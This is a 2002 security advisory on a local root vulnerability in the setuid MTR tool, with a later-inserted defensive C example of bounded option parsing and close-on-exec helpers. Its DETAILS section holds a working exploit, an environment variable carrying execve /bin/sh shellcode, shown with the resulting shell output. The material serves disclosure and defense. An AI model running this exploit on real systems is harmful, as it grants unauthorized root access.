[EXPL] MTR Allows Local Users to Gain Root Privileges

From: support@securiteam.com
Date: 03/09/02


From: support@securiteam.com
To: list@securiteam.com
Date: Sat,  9 Mar 2002 11:54:06 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  MTR Allows Local Users to Gain Root Privileges
------------------------------------------------------------------------

SUMMARY

 <http://www.bitwizard.nl/mtr/> MTR is a network diagnostic tool that
combines 'ping' and 'traceroute' into one program. A security
vulnerability in the product allows execution of arbitrary code and
gaining of elevated privileges. It should be noted that MTR's author does
not recommend that the program be executed as setuid root.

DETAILS

Exploit code:
The sample exploit is TRIVIAL because of the strtok/while loop in the
vulnerable code.

$ uname -smr
Linux 2.4.8-26mdk i686
$ setenv MTR_OPTIONS `perl -e 'print "A "x130 .
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08
\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"'`
$ ./mtr
sh-2.05$

At this point, the exec'd shell still has the raw sockets open:

$ /usr/sbin/lsof | grep raw
sh 17263 venglin 3u raw 605400 00000000:00FF->00000000:0000 st=07
sh 17263 venglin 4u raw 605401 00000000:0001->00000000:0000 st=07
sh-2.05$ ls -la /proc/self/fd/
total 0
dr-x------ 2 venglin venglin 0 Mar 6 15:40 .
dr-xr-xr-x 3 venglin venglin 0 Mar 6 15:40 ..
lrwx------ 1 venglin venglin 64 Mar 6 15:40 0 -> /dev/pts/6
lrwx------ 1 venglin venglin 64 Mar 6 15:40 1 -> /dev/pts/6
lrwx------ 1 venglin venglin 64 Mar 6 15:40 2 -> /dev/pts/6
lrwx------ 1 venglin venglin 64 Mar 6 15:40 3 -> socket:[605400]
lrwx------ 1 venglin venglin 64 Mar 6 15:40 4 -> socket:[605401]
lr-x------ 1 venglin venglin 64 Mar 6 15:40 5 -> /proc/17318/fd
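A defensive counterpart to the two problems shown above, added here as an example and not taken from MTR's own source: a bounded replacement for the strtok/while loop that fills an argv-style array from an environment variable such as MTR_OPTIONS, and a helper that marks an inherited descriptor (the raw sockets listed above, for instance) close-on-exec so an exec'd child cannot reuse it. The function names, MAX_ARGS and the sample option string are assumptions.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <string.h>
#include <unistd.h>

/* Hypothetical hardened replacement for an unbounded strtok/while loop that
 * splits an environment variable into an argv-style array. The advisory's
 * bug class is a loop that keeps writing tokens past a fixed array; this
 * version stops at max_args - 1 and reports the overflow instead. */
#define MAX_ARGS 32

/* Returns the number of tokens stored, or -1 if the input holds more tokens
 * than fit (the last slot is reserved for the NULL terminator). `buf` is
 * modified in place, as with strtok_r; on -1 args[0] is NULL. */
int split_options(char *buf, char **args, int max_args)
{
    int n = 0;
    char *save = NULL;
    for (char *tok = strtok_r(buf, " \t", &save); tok; tok = strtok_r(NULL, " \t", &save)) {
        if (n >= max_args - 1) {
            args[0] = NULL;   /* refuse the whole input rather than truncate silently */
            return -1;
        }
        args[n++] = tok;
    }
    args[n] = NULL;
    return n;
}

/* Marks a descriptor close-on-exec so that a child started with exec()
 * (such as a shell) does not inherit it. Returns 0 on success, -1 on error. */
int set_cloexec(int fd)
{
    int flags = fcntl(fd, F_GETFD);
    if (flags == -1)
        return -1;
    return fcntl(fd, F_SETFD, flags | FD_CLOEXEC) == -1 ? -1 : 0;
}

/* Returns 1 if fd carries FD_CLOEXEC, 0 if not, -1 on error. */
int has_cloexec(int fd)
{
    int flags = fcntl(fd, F_GETFD);
    if (flags == -1)
        return -1;
    return (flags & FD_CLOEXEC) ? 1 : 0;
}
```

Privileged sockets should be opened before privileges are dropped and marked close-on-exec at that point; a pipe stands in for them here so the helper can be exercised without root.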

ADDITIONAL INFORMATION

The information has been provided by <mailto:venglin@freebsd.lublin.pl>
Przemyslaw Frasunek.
